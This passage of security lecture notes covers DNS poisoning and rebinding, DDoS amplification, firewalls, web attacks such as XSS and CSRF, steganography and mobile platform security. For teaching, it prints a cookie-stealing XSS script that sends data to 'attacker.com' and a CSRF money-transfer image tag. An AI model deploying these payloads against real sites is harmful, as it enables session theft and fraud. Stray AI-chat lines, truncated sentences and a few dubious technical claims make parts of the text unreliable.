To address these issues, DNSSEC (DNS Security Extensions) was introduced. DNSSEC allows responses to be digitally signed, enabling clients to verify their authenticity. However, deployment remains limited due to complexity, larger response sizes, and compatibility challenges.

Pharming Attack

A pharming attack manipulates DNS resolution to redirect a victim’s traffic to a malicious destination. This can be done in several ways:

  • Modifying the local system’s hosts file to insert malicious name-to-IP mappings.
  • Changing the DNS server configuration (e.g., via malware or rogue DHCP responses), causing the system to use an attacker-controlled DNS server.
  • Compromising legitimate DNS servers and altering the records they return.

By corrupting DNS resolution at the source, attackers can transparently redirect users to malicious sites without altering URLs or requiring user interaction.

DNS Cache Poisoning (DNS Spoofing)

A DNS cache poisoning attack corrupts the resolver’s cache with forged responses, leading to persistent redirection of traffic to malicious addresses.

A common variant leverages JavaScript in a malicious webpage to repeatedly trigger DNS queries for non-existent subdomains (e.g., a.bank.com). These queries prompt a legitimate DNS resolver to issue requests for the unknown subdomain. Simultaneously, the attacker floods the resolver with spoofed responses, each containing a different random Query ID and pointing to a rogue DNS server for the target domain (e.g., bank.com). If a spoofed response has a matching QID, the resolver accepts it and caches the malicious DNS server as authoritative for the domain. All future queries for bank.com and its subdomains will be redirected.

If the attempt fails, the attacker simply repeats it with a new subdomain (b.bank.com, c.bank.com, etc.), increasing the odds of success.

Summary: Attackers forge DNS responses with random query IDs in the hope that one matches an active query. A successful match poisons the cache, redirecting future queries to attacker-controlled IP addresses.

DNS Rebinding

DNS rebinding is a browser-based attack that exploits the same-origin policy by manipulating DNS resolution.

Here’s how it works:

  1. The attacker registers a domain (e.g., attacker.com) and sets up a DNS server.
  2. The domain’s DNS record is configured with a short TTL, allowing rapid updates.
  3. The victim visits a malicious webpage at attacker.com, which loads JavaScript.
  4. Because the script is from the same origin (attacker.com), it can make requests back to the domain.
  5. The attacker’s DNS server quickly changes the IP address for attacker.com to an internal IP (e.g., 192.168.1.1).
  6. The JavaScript, still considered to be from the same origin, now gains access to internal systems.

Summary: By quickly changing a domain’s resolved IP address after a script is loaded, attackers can bypass same-origin restrictions and access internal network resources.

Distributed Denial of Service (DDoS) Attacks

A Distributed Denial of Service (DDoS) attack aims to make a service unavailable by overwhelming it with traffic from many sources. These attacks can target servers, applications, or entire networks, making them inaccessible to legitimate users. Motivations range from extortion and political activism to cover for data breaches or simply disrupting services.

DDoS attacks often leverage botnets. These are networks of compromised devices called zombies, which are remotely controlled by a command and control (C&C) server. Each zombie can generate traffic, and the distributed nature of these attacks makes mitigation difficult.

Techniques Used in DDoS Attacks

Attackers commonly use the following techniques:

  1. Exploiting Asymmetry: Target systems where handling requests (e.g., complex queries or SSL handshakes) is far more resource-intensive than sending them.
  2. Spoofing Source Addresses: Hide the origin of traffic and avoid replies by using fake source IPs.
  3. Reflection: Send spoofed requests to third-party servers, which reply to the victim.
  4. Amplification: Use services that respond with far more data than they receive, multiplying the effect.
  5. Botnets: Coordinate thousands or millions of devices to generate massive traffic.

Forms of Overwhelming a Target

  • Volumetric Attacks: Exhaust bandwidth by flooding with high data volumes (e.g., measured in Tbps).
  • Packet-per-Second (PPS) / Request-per-Second (RPS) Attacks: Overload processing capacity by sending small packets or HTTP requests at a high rate.
  • Application-Layer Loops: Abuse certain UDP protocols (e.g., TFTP, DNS) to cause endless response loops between misconfigured servers.

Reflection and Amplification Attacks

Reflection amplification attacks are a powerful and efficient DDoS technique that allows an attacker to direct large volumes of traffic at a target using minimal resources. The core idea is to exploit intermediary servers—typically public, UDP-based services—to act as unwitting amplifiers.

Because UDP is connectionless and doesn’t validate sender addresses, attackers can spoof the victim’s IP as the source. The service replies to the victim with a response that is often far larger than the original request, amplifying the traffic volume.

Amplification is an appealing technique fr several reasons:

  • Efficiency: A small spoofed request can generate a massive response, sometimes over 50,000 times larger, allowing an attacker to create a huge data flood with little effort.

  • Anonymity: The attacker spoofs the source IP address to make it appear as though the target initiated the request. This obscures the attack’s true origin, making it extremely difficult to trace.

  • Evasion: Since responses come from legitimate servers, filtering traffic based on source IPs becomes challenging.

  • Global scale: The use of distributed public servers spreads out the load, bypassing bandwidth limitations on the attacker’s side.

Amplification factors vary by service:

Protocol Amplification Factor Notes
Memcached Up to 51,200× Highly abused; can store large payloads
NTP (Monlist) 556× Returns 600 recent IP addresses
DNS (ANY query) 50–179× Returns all resource records
CLDAP 56–70× Common in misconfigured Windows DCs
DTLS 37× Datagram TLS—UDP-based SSL variant

For example, a 60-byte DNS query for “ANY” records can produce a 3,500-byte response (58× amplification).

Botnets and Command & Control

A botnet is a distributed network of infected devices under the control of a command & control (C&C) server. Each device, or zombie, waits for instructions from the C&C server to begin an attack. Botnets are often built using malware like Mirai, which targets IoT devices with default credentials.

Botnets are difficult to detect and block because:

  • Traffic originates from many IP addresses and regions.
  • The attack doesn’t come from a single identifiable source.
  • Many devices may be legitimate hosts unwittingly participating.

In addition to overwhelming targets with traffic, botnets must maintain control and coordination. This is typically achieved through a command and control (C&C) infrastructure, which sends instructions to infected devices (zombies) and receives updates in return.

To evade detection and bypass firewalls or intrusion detection systems, botnets often employ covert communication techniques, such as:

DNS Tunneling: Botnets encode commands or data into DNS queries or responses. Since DNS traffic is widely allowed through firewalls and rarely inspected closely, it offers a discreet channel for communication. For example, a bot might send a query like cmd123.attacker.com, where the subdomain encodes a command, and the DNS server under attacker control interprets and responds with encoded data.

Encrypted C&C Channels: Botnets may also use HTTPS or custom encrypted protocols over standard ports (e.g., TCP 443) to hide C&C traffic in normal web flows.

By hiding command traffic inside benign-looking or commonly allowed protocols like DNS, botnets can persist in networks for long periods without detection, while continuing to receive commands or exfiltrate data.

Defensive Strategies

Network-Level Defenses

  • Rate Limiting: Limit how many requests a client can make.
  • Traffic Shaping: Prioritize essential traffic; deprioritize or throttle UDP.
  • Traffic Filtering: Block packets with suspicious source or destination ports/IPs.
  • Blackhole Routing: Drop traffic to a victim IP entirely to protect infrastructure.
  • IP Blacklisting: Block known bad IPs or regions.

Application-Level Defenses

  • Web Application Firewalls: Inspect and filter HTTP/S traffic.
  • CAPTCHAs: Block automated requests by requiring user interaction.
  • Content Delivery Networks (CDNs): Offload traffic to edge servers. Companies that run CDNs, like Akamai or Amazon, have a huge number of load-balanced content servers distributed around the world across many ISPs. Even the largest DDoS attacks are unlikely to overwhelm them.

Participation Mitigation

  • Disable Unused Services: Especially UDP-based services vulnerable to amplification.
  • Monitor Traffic: Watch for unusual volumes from internal systems.
  • Patch Exposed Servers: Keep systems like memcached or CLDAP secure and access-controlled.

Firewalls

Firewalls are a critical component of network security architecture. Their primary role is to protect the boundary between a trusted internal network and an untrusted external one, such as the Internet. A firewall enforces access control policies by inspecting and filtering traffic that flows between these two environments.

Firewalls operate at different layers of the network stack and have evolved over time: from basic packet filtering to sophisticated systems capable of application-aware inspection and behavioral analysis.

Network Address Translation (NAT)

One early innovation associated with firewall deployment is Network Address Translation (NAT). NAT enables multiple devices within a private network to share a single public IP address. It maps internal source addresses and ports to external ones, modifying both IP and transport-layer headers.

This technique was driven by the limited supply of IPv4 addresses. Private IP ranges defined in RFC 1918 (e.g., 192.168.0.0/16, 10.0.0.0/8) are non-routable on the public Internet and require NAT to communicate externally.

NAT inherently provides a security benefit: unsolicited inbound traffic from external hosts cannot reach internal systems unless a session has already been initiated from inside.

Packet Filtering Firewalls

First-generation firewalls, also known as packet filters or screening routers, inspect network packets independently. These filters operate by matching packet header fields against a set of rules, known as an access control list (ACL), and taking an action—typically to accept, drop, or reject the packet.

This set of rules is often referred to as a chain because the firewall processes the rules sequentially, like links in a chain:

  • Each incoming or outgoing packet is matched against the rules in order.
  • Once a rule matches, its corresponding action is applied and no further rules are evaluated.
  • If no rule matches, a default policy—typically “deny all”—is applied.

The term “chain” is commonly used in firewall implementations like Linux’s iptables and nftables, where different chains can be defined for handling various traffic flows (e.g., input, output, forwarding), and rules can jump to other chains for more modular control.

Rules in a packet filter typically examine:

  • Source and destination IP addresses
  • Source and destination ports
  • Protocol (e.g., TCP, UDP, ICMP)
  • Interface on which the packet was received

The security model often follows “default deny,” meaning only explicitly allowed traffic is permitted. These filters do not maintain any context between packets, making them stateless but efficient.

Stateful Packet Inspection(SPI)

Second-generation firewalls introduced Stateful Packet Inspection (SPI). These firewalls maintain state tables to track the status of network connections, especially useful for TCP, which involves distinct setup and teardown phases.

Stateful firewalls can:

  • Allow return traffic only after a valid connection is initiated
  • Block unsolicited packets that appear malicious (e.g., spoofed TCP packets)
  • Track stateless protocols like UDP and ICMP by observing request-reply relationships

This state tracking makes SPI firewalls more secure and functional than stateless filters.

Deep Packet and Content Inspection

Third-generation firewalls implement Deep Packet Inspection (DPI). Unlike earlier models that focus only on IP and transport headers, DPI firewalls examine application-layer content.

This allows:

  • Detection of protocol misuse (e.g., malformed HTTP headers)
  • Filtering based on URLs, file types, or keywords
  • Blocking of risky elements like ActiveX or Java applets

Deep Content Inspection (DCI) extends DPI by reconstructing entire content streams, decoding them (e.g., base64 in email), and scanning for malware signatures or sensitive data leaks.

Deep Packet Inspection (DPI) and Deep Content Inspection (DCI) face challenges when dealing with encrypted traffic, such as HTTPS, SSH, or TLS-protected protocols. There are a few approaches to dealing with this, none of them great:

  • Examine only headers and protocols: Even when data is encrypted, certain metadata like source/destination IP addresses, ports, and TLS handshake parameters remain visible. DPI can still infer the protocol in use and possibly the domain name (via Server Name Indication in TLS), but not the actual content.
  • Man-in-the-Middle (MitM) Interception: The DPI device to present its own TLS certificate to the client. The DPI system acts as an intermediary, terminating the secure connection from the client and creating a new encrypted session to the server. This breaks end-to-end encryption but is often used by next-generation firewalls.
  • Host-based firewalls: Instead of decrypting in the network (at the firewall), the inspection may happen at the endpoint before encryption (for outgoing traffic) or after decryption (for incoming traffic) using host-based firewalls or other security agents.

Application Proxies

Application-layer proxies mediate communication for specific protocols (e.g., HTTP, FTP). They terminate connections from clients, inspect requests, and then relay traffic to the target server if the request passes policy checks.

These proxies can:

  • Enforce strict protocol compliance
  • Prevent direct connections between networks
  • Operate on dual-homed hosts for added segmentation

Security Zones and DMZs

Modern networks are divided into security zones to manage risk and enforce access control policies. Each zone represents a grouping of systems with similar trust levels and security requirements. By segmenting networks into zones and controlling traffic between them using firewalls, organizations can limit the potential damage of security breaches and prevent lateral movement by attackers.

One key architectural concept is the Demilitarized Zone (DMZ). The DMZ is a semi-trusted zone that sits between the external Internet and the internal network. It hosts public-facing services, such as web servers, DNS servers, and mail relays, that need to be accessible to external users but should not have unrestricted access to sensitive internal systems.

A bastion host is a system placed in the DMZ that is hardened and exposed to potential attacks. Because it interfaces with untrusted networks, it is designed to resist compromise:

  • It runs only essential services
  • It uses minimal software
  • It has limited user accounts
  • It is regularly audited for vulnerabilities

A DMZ architecture typically involves two firewalls or a multi-interface firewall.Traffic is tightly controlled at each boundary:

  • External clients can access only specific services hosted in the DMZ.
  • Internal clients can reach both the DMZ and the Internet, subject to policy.
  • DMZ systems have limited access to internal systems and the Internet.

This layered defense strategy helps contain compromises and provides a buffer zone between the most vulnerable systems and the organization’s critical assets.

Intrusion Detection and Prevention Systems (IDS/IPS)

Intrusion Detection Systems (IDS) monitor traffic to detect suspicious behavior and alert administrators. Intrusion Prevention Systems (IPS) actively block malicious traffic in real time.

Types of detection include:

  • Protocol-based IDS: Enforces protocol correctness (e.g., HTTP header validation)
  • Signature-based IDS: Matches known attack patterns (e.g., malware signatures)
  • Anomaly-based IDS: Detects deviations from established baseline behavior

While signature-based detection is precise for known threats, anomaly detection can identify novel attacks at the cost of more false positives.

Host-Based Firewalls

Unlike network firewalls, host-based firewalls run on individual systems and monitor traffic per application. They offer fine-grained control and are valuable in a deperimeterized world, where the distinction between internal and external networks has eroded.

One key advantage of host-based firewalls is their ability to associate network activity with specific applications running on the system. Unlike traditional packet filters that make decisions based solely on IP addresses and port numbers, host-based firewalls can identify and control network traffic on a per-application basis.

This enables the firewall to:

  • Allow or block traffic based on the identity of the software process, not just network attributes
  • Prompt users to approve or deny network access when a new application attempts communication
  • Define granular policies, such as permitting only a web browser to access the Internet, while blocking all traffic from unknown or suspicious programs
  • Prevent unauthorized or malicious software from exfiltrating data, even if it attempts to use commonly allowed ports like 443 (HTTPS)

This per-application awareness makes host-based firewalls particularly effective at detecting and containing malware. If an unapproved program attempts to send data to the Internet, it can be blocked even if it mimics legitimate traffic.

However, this model is not without its limitations. If malware gains elevated privileges, such as root or administrative access, it may be able to disable the firewall or manipulate its configuration, undermining the protections it provides.

Despite this risk, host-based firewalls are a crucial component of a defense-in-depth strategy. They complement network-level protections by offering localized, context-aware control tailored to the specific behavior of individual systems and applications.

Zero Trust and Deperimeterization

With the rise of mobile devices, cloud computing, and remote work, internal networks can no longer be assumed trustworthy. Deperimeterization describes the collapse of traditional network boundaries.

The Zero Trust Architecture (ZTA) model addresses this by requiring authentication and authorization for every connection, regardless of its source. Key principles include:

  • No implicit trust for devices on the internal network
  • Least privilege access enforced dynamically
  • Continuous validation of users, devices, and policies

ZTA may require micro-segmentation, strong identity verification, and support from both network infrastructure and applications.

Summary

Type Description
Screening Router 1st-gen firewall using IP, port, and protocol filtering
Stateful Inspection 2nd-gen firewall that tracks connection state
Deep Packet Inspection 3rd-gen firewall with application-layer awareness
Deep Content Inspection Examines full data streams across packets
Application Proxy Acts as intermediary, enforces protocol correctness
IDS/IPS Detects or prevents attacks, often as part of DPI
Host-Based Firewall Runs on endpoints, offers per-application controls
Host-Based IPS Blocks specific malicious actions in real time (e.g., port scans)
Zero Trust Architecture Policy-driven, identity-aware access control across all assets

Web Security

Web applications have grown from static pages into highly interactive platforms. This transformation has introduced a wide attack surface, shifting attention from server vulnerabilities to complex browser and client-side threats. Today, web security must address how scripts, data, and user state interact across trust boundaries in the browser.

Same-Origin Policy

The same-origin policy (SOP) is the foundation of browser security. It restricts how documents or scripts loaded from one origin can interact with resources from another.

An origin is defined by:

  • Scheme (e.g., http or https)
  • Hostname
  • Port

Resources sharing all three attributes are of the same origin. The same-origin policy prevents a script on one site from reading data (like cookies or DOM) from another origin. While content like images and stylesheets can be embedded from other origins, they cannot be programmatically accessed or modified.

Cross-Origin Resource Sharing (CORS)

Modern web applications routinely load content from multiple origins. A single page might include analytics scripts from Google, fonts from a CDN, and interactive elements from a separate application domain. This modularity improves performance, reduces redundancy, and allows the integration of specialized services. However, it also introduces potential security risks since the same-origin policy would ordinarily block interaction between different origins.

Cross-Origin Resource Sharing (CORS) is a standardized mechanism that enables secure cross-origin requests. It allows servers to specify which external origins are permitted to access their resources via HTTP headers.

For example:

Access-Control-Allow-Origin: https://trusted-site.com

This tells the browser that scripts from https://trusted-site.com can access resources from the server as if they were of the same origin. CORS is essential for enabling the safe, flexible, and secure integration of third-party services in web applications.

Absolutely — here is the refined Cookies and Web State section with a clearer structure. It now separates duration-based types (session vs. persistent) from origin-based types (first-party vs. third-party), and each category includes brief explanations:

Cookies and Web State

Cookies store small name-value pieces of data in the browser and are sent with each HTTP request to the matching domain and path. They allow websites to maintain state across page loads and sessions.

Cookies are used for three main purposes:

  • Session management: Identify logged-in users, maintain session state, and manage items like shopping carts or form progress.
  • Personalization: Store user preferences such as language, layout, or theme for a customized experience.
  • Tracking: Monitor user behavior across visits or across sites (via third-party cookies), enabling analytics and targeted advertising.

Cookie Types by Duration

  • Session cookies: Temporary; stored in memory and deleted when the browser closes. Commonly used for login sessions or temporary interactions. Persistent cookies: These are stored on disk with an expiration date and are used to remember user preferences or identifiers across browser restarts.

Cookie Types by Origin

First-party cookies: These are set by the domain in the browser’s address bar and are used to maintain sessions, settings, and internal functionality.

  • Third-party cookies: Set by embedded content from external domains (e.g., ads or trackers). Primarily used for tracking users across different websites.

Cookie Flags

  • HttpOnly: Blocks access from JavaScript, helping protect session cookies from XSS attacks.
  • Secure: Restricts the cookie to HTTPS connections, protecting it from being sent over insecure channels.
  • SameSite: Controls whether cookies are sent on cross-site requests. Helps mitigate CSRF attacks.

Cookies are further scoped by domain and path, limiting when they are included in requests. Due to privacy concerns, modern browsers are moving toward restricting or phasing out third-party cookies.

Cross-Site Request Forgery (CSRF)

CSRF exploits browser behavior by inducing users to send authenticated requests to a site without their knowledge.

Example:

If a user is logged into their bank, an attacker can embed a request to transfer money in an image tag:

<img src="https://bank.com/transfer?amount=1000&to=attacker" />

Defenses:

  • CSRF tokens: Embed a unique token in each form; the server verifies it on submission to ensure the request came from the correct user.
  • SameSite cookies: Prevent cookies from being sent in cross-site requests unless explicitly allowed.
  • Referer or Origin header validation: Ensure the request came from the expected domain.
  • Log out users after inactivity: Reduces the time window for a successful CSRF attempt.

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks inject malicious scripts into web pages that are then executed in the browser of users who visit the affected pages. These scripts run with the same privileges as trusted content, allowing attackers to hijack sessions, steal cookies, manipulate the DOM, or redirect users to malicious sites.

Stored (Persistent) XSS

In a stored XSS attack, the malicious script is permanently stored on the server—typically in a database, forum post, user profile, comment, or message. Every time a victim loads the affected page, the script is delivered as part of the content and runs in their browser.

Example:

  • An attacker posts a comment like:
  <script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>

  • Any user viewing the comment will execute the script, unknowingly leaking their session data to the attacker.

Stored XSS is especially dangerous because:

  • It does not require social engineering after the script is planted.
  • It can affect many users who simply view the page.
  • It persists until removed from the server or sanitized.

Reflected XSS

In reflected XSS, the malicious input is not stored but instead immediately returned in a server response. The attack usually involves a crafted URL containing a payload in a query parameter or fragment that the server echoes into the HTML page without proper sanitization.

Example:

  • A victim clicks a malicious link such as:
  https://example.com/search?q=<script>steal()</script>

  • The server embeds the q parameter directly into the response page:
  Search results for: <script>steal()</script>

  • The script runs as soon as the page loads, allowing the attacker to perform actions on the victim’s behalf or exfiltrate data.

Reflected XSS:

  • Typically requires the attacker to trick the victim into clicking a malicious link.
  • Is often delivered through phishing emails, social media messages, or malicious advertisements.
  • Affects only the users who interact with the crafted URL.

Defenses

  • Input validation and output encoding: Reject or sanitize dangerous characters before inserting input into the page. Always encode untrusted output into HTML, JavaScript, or attributes.
  • Secure templating engines: Use libraries that automatically escape output (e.g., Django, Handlebars, React JSX).
  • Content Security Policy (CSP): Restrict the sources from which scripts can be loaded, and disallow inline JavaScript.
  • HttpOnly cookies: Prevent JavaScript from accessing cookies, reducing the impact of successful attacks.

Here’s the updated Clickjacking section with slightly more detailed explanation while maintaining a concise style:


Clickjacking

Clickjacking is a deceptive technique where an attacker tricks a user into clicking on something different from what the user perceives, typically by layering transparent or disguised elements over visible content.

For example, an attacker might embed a legitimate site (like a social media or banking page) inside a transparent <iframe> that is positioned over a fake button. When the user thinks they’re clicking the fake button (e.g., “Claim Prize”), they’re actually clicking a hidden button on the legitimate site, such as “Like,” “Confirm,” or “Transfer.”

Potential consequences of clickjacking include:

  • Submitting forms or triggering actions without the user’s knowledge.
  • Changing security settings or authorizing transactions.
  • Unintended interaction with social media (e.g., liking a post, following an account).
  • Installing malware or enabling browser/device features (e.g., webcam).

Defenses against clickjacking include:

  • X-Frame-Options header: Tells the browser whether the page can be embedded in an <iframe>. Set to DENY or SAMEORIGIN to prevent third-party framing. Content Security Policy (CSP)**: The frame-ancestors directive restricts which origins can embed the page.
  • JavaScript frame-busting: Pages can include scripts that check if the current window is the top-level window:
  if (window.top !== window.self) {
    window.top.location = window.location;
  }

However, client-side checks are not foolproof and should be combined with server-side headers.

WebAssembly and Browser Extensions

WebAssembly (Wasm) allows compiled binary code to run in browsers, increasing performance—but also making malicious code harder to inspect.

Browser extensions, especially those with wide permissions, can exfiltrate data or modify content. They pose a significant risk if poorly vetted.

DNS Rebinding

An attacker can exploit DNS to change a domain’s IP address after the browser has cached it, tricking it into treating a new server as the same origin.

Defenses:

  • Prevent DNS resolution to private IPs
  • Enforce long DNS TTLs

Homograph and Typosquatting Attacks

Homograph attacks use visually similar Unicode characters to deceive users:

  • paypaI.com (with a capital ‘I’) vs. paypal.com

Typosquatting registers domain names that are slight misspellings of legitimate ones, hoping users will make typographical errors. Examples: gooogle.com, amaz0n.com.

Combosquatting is a related tactic where attackers register plausible-looking domain variants by appending or inserting words to mimic a real brand. Examples: chase-bank-login.com, paypal-support.site.

Both techniques are used in phishing, ad fraud, and malware distribution campaigns.

Package Repository Attacks

Attackers upload malicious libraries to public repositories using:

  • Typosquatting: e.g., requet instead of request
  • Dependency confusion: Exploiting mismatches between internal and public package namespaces

These attacks have successfully targeted major companies like Apple, Shopify, and Tesla.

Tracking via Images

Image tags (<img>) are treated as passive content, but they can be used to track users when embedded with unique URLs or placed invisibly in pages or emails.

A tracking pixel is a 1×1 image whose URL includes identifiers or page-specific data. When loaded:

  • The browser sends a request to the image’s server.
  • All cookies associated with that domain are included.
  • The URL may carry parameters identifying the user or page.
  • The server logs this along with IP, user agent, and referer data.

This allows the server to track views of a message or web page and correlate user activity across multiple sites or visits—even without JavaScript.

Tracking pixels are common in advertising, email marketing, and third-party analytics.

Deception and Spoofing

Social engineering attacks exploit:

  • Status bar spoofing via JavaScript
  • Misleading display vs. landing URLs
  • Fake site layouts using cloned CSS and images

Users may be tricked into disclosing credentials or installing malware, believing the site is legitimate.

Conclusion

Modern web security must address a massive attack surface introduced by scripts, dynamic content, and third-party services. Developers must validate all inputs, isolate content using SOP and CORS, and secure user state with proper cookie attributes and CSP. Browser vendors, site administrators, and developers all play roles in reducing risk in this adversarial ecosystem.

Steganography

Cryptography’s goal is to hide the contents of a message. Steganography’s goal is to hide the very existence of the message. Classic techniques included the use of invisible ink, writing a message on one’s head and allowing the hair to cover it, microdots, and carefully-clipped newspaper articles that together communicate the message.

A null cipher is one where the actual message is hidden among irrelevant data. For example, the message may comprise the first letter of each word (or each sentence, or every second letter, etc.). Chaffing and winnowing entails the transmission of a bunch of messages, of which only certain ones are legitimate. Each message is signed with a key known only to trusted parties (e.g., a MAC). Intruders can see the messages but can’t validate the signatures to distinguish the valid messages from the bogus ones.

Messages can be embedded into images. There are a couple of ways of hiding a message in an image:

  1. A straightforward method to hide a message in an image is to use low-order bits of an image, where the user is unlikely to notice slight changes in color. An image is a collection of RGB pixels. You can mess around with the least-significant bits and nobody will notice changes in the image, so you can just encode the entire message by spreading the bits of the message among the least-significant bits of the image.

  2. You can do a similar thing but apply a frequency domain transformation, like JPEG compression does, by using a Discrete Cosine Transform (DCT). The frequency domain maps the image as a collection ranging from high-frequency areas (e.g., “noisy” parts such as leaves, grass, and edges of things) through low-frequency areas (e.g., a clear blue sky). Changes to high frequency areas will mostly be unnoticed by humans: that’s why jpeg compression works. It also means that you can add your message into those areas and then transform it back to the spatial domain. Now your message is spread throughout the higher-frequency parts of the image and can be extracted if you do the DCT again and know where to look for the message.

Many laser printers embed a serial number and date simply by printing very faint color splotches.

Steganography is closely related to watermarking. and the terms “steganography” and “watermarking” are often used interchangeably.

The primary goal of watermarking is to create an indelible imprint on a message such that an intruder cannot remove or replace the message. It is often used to assert ownership, authenticity, or encode DRM rules. The message may be, but does not have to be, invisible.

The goal of steganography is to allow primarily one-to-one communication while hiding the existence of a message. An intruder – someone who does not know what to look for – cannot even detect the message in the data.

App Integrity

Android enforces integrity through application signing and app verification processes. Developers sign their apps with a private key, and the corresponding public key is used to verify the app’s integrity upon installation. The Google Play Store further reinforces this by vetting apps before they are available for download, ensuring that only those that haven’t been tampered with are accessible to users.

The Android app sandbox

Android supports only a single user and uses Linux user IDs for isolating app privileges. Under Android, each app normally runs under a different user ID. Hence, apps are isolated and can only access their resources. Access requests to other objects involve messages that pass through a gatekeeper, which validates access requests.

Two mechanisms are used to enforce file access permissions:

  1. Linux file permissions These provide discretionary access control, allowing the owner (and root) to change permissions to allow others access to the files. With this mechanism, an app can decide to share a data file.

  2. SELinux mandatory access control Certain data and cache directories in Android are protected with the SELinux (Security-Enhanced Linux) mandatory access control (MAC) kernel extension. This ensures that even the owner cannot change access permissions for the files.

Internal storage provides a per-app private directory for files used by each application. External storage (e.g., attached microSD cards or USB devices) is shared among all apps and, of course, may be moved to other computers.

Other protections

The Linux operating system provides per-process memory isolation and address space layout randomization (ASLR). Linux also uses no-execute (NX) protection on stack and heap memory pages if the processor supports it

The Java compiler provides stack canaries, and its memory management libraries provide some heap overflow protections (checks of backward & forward pointers in dynamically allocated structures).

Android supports whole disk encryption so that if a device is stolen, an attacker will not be able to easily recover file contents even with raw access to the flash file system.

Unlike iOS, Android supports the concurrent execution of multiple apps. It is up to the developer to think about being frugal with battery life. Apps store state their state in persistent memory so they can be stopped and restarted at any time. This ability to stop an app also helps with DoS attacks as the app is not accepting requests or using system resources.

iOS security

App signing

iOS requires mandatory code signing. Unlike Android, which accepts self-signed certificates, the app package must be signed using an Apple Developer certificate and apps are only available for This does not ensure the trustworthiness of an app but identifies the registered developer and ensures that the app has not been modified after it has been signed.

Runtime protection

Apple’s iOS provides runtime protection via OS-level sandboxing using a kernel-level sandbox. System resources and the kernel are shielded from user apps. The sandbox limits which system calls an app can make and the parameters to system calls. Except through kernel exploits, an app cannot leave its sandbox.

The app sandbox restricts the ability of one app to access another app’s data and resources. Each app has its own sandbox directory. The OS enforces the sandbox and permits access only to files within that directory, as well as restricted access to to system preferences, the network, and other resources.

Inter-app communication can take place only through iOS APIs. Code generation by an app is prevented because data memory pages cannot be made executable and executable memory pages are not writable by user processes.

Data protection

All file contents are encrypted with a unique 256-bit AES per-file key, which is generated when the file is created.

This per-file key is encrypted with a class key and is stored along with the file’s metadata, which is part of the file system that describes attributes of the file, such as size, modification time, and access permissions.

The class key is generated from a hardware key in the device and the user’s passcode. Unless the passcode is entered, the class key cannot be created and the file key cannot be decrypted.

The file system’s metadata is also encrypted. A file system key is used for this, which is derived directly from the hardware key, which is generated when iOS is installed. Keys are stored in Apple’s Secure Enclave, a separate processor and isolated memory that cannot be accessed directly by the main processor. Encrypting metadata encrypts the entire structure of the file system. Someone who rips out the flash memory from an iOS device and examines it can see neither file contents (they are encrypted with per-file keys) nor information about those files (the metadata is encrypted with a file system key).

A hardware AES engine encrypts and decrypts the file as it is written/read on flash memory so file encryption is done transparently and efficiently.

The iOS kernel partition is mounted read-only, so even if an app manages to break out of its sandbox due to some vulnerability and gain root access, it will still not have permission to modify the kernel.

Additional kernel and hardware protection

In addition to the sandbox, iOS also uses address space layout randomization (ASLR) and memory execute protection for stack and heap pages via ARM’s Execute Never (XN) memory page flag.

Hardware support for security

ARM TrustZone worlds
ARM TrustZone worlds

All Android and iOS phones currently use ARM processors. ARM provides a dedicated security module, called TrustZone, that coexists with the normal processor. The hardware is separated into two “worlds”: secure (trusted) and non-secure (non-trusted) worlds. Any software resides in only one of these two worlds and the processor executes in only one world at a time.

Each of these worlds has its own operating system and applications. Android systems run an operating system called Trusty TEE in the secure world and, of course, Linux in the untrusted world.

Logically, you can think of the two worlds as two distinct processors, each running their own operating system with their own data and their own memory. Non-secure applications cannot access any own memory or registers of secure resources directly. The only way they can communicate is through a messaging API.

In practice, the hardware creates two virtual cores for each CPU core, managing separate registers and all processing state in each world.

The phone’s operating system and all applications reside in the non-trusted world. Secure components, such as cryptographic keys, signature services, encryption services, and payment services live in the trusted world. Even the operating system kernel does not have access to any of the code or data in the trusted world. Hence, even if an app manages a privilege escalation attack and gains root access, it will be unable to access certain security-critical data.

Applications for the trusted world include key management, secure boot, digital rights management, secure payment processing, mobile payments, and biometric authentication.

Apple Secure Enclave

Apple uses modified ARM processors for iPhones and iPads. In 2013, they announced Secure Enclave for their processors. The details are confidential but it appears to be similar in function to ARM’s TrustZone but designed as a physically separate coprocessor. As with TrustZone, the Secure Enclave coprocessor runs its own operating system (a modified L4 microkernel in this case).

The processor has its own secure bootloader and custom software update mechanism. It uses encrypted memory so that anything outside the Secure Enclave cannot access its data. It provides:

  • All cryptographic operations for data protection & key management.
  • Random number generation.
  • Secure key store, including Touch ID (fingerprint) and the Face ID neural network.
  • Data storage for payment processing.

The Secure Enclave maintains the confidentiality and integrity of data even if the iOS kernel has been compromised.

–>

Last modified December 7, 2024.
recycled pixels